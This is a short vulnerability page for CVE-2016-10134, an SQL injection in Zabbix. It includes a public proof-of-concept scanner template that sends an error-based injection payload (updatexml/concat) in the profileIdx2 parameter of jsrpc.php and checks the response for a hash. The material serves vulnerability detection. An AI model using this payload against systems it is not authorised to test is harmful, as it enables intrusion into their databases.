CVE-2016-10134: Zabbix SQL Injection Vulnerability

Date: 2025-09-01 | Affected software: Unknown | PoC: Public

Vulnerability Description

SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php.

PoC code [public]

id: CVE-2016-10134

info:
  name: Zabbix SQL Injection Vulnerability
  author: sharecast
  severity: critical
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10134
  description: |-
    SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php.
  tags: cve,cve2016,zabbix,rce
  created: 2023/07/13

set:
  r: randomInt(2000000000, 2100000000)
rules:
  r0:
    request:
      method: GET
      path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0)
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31)))
expression: r0()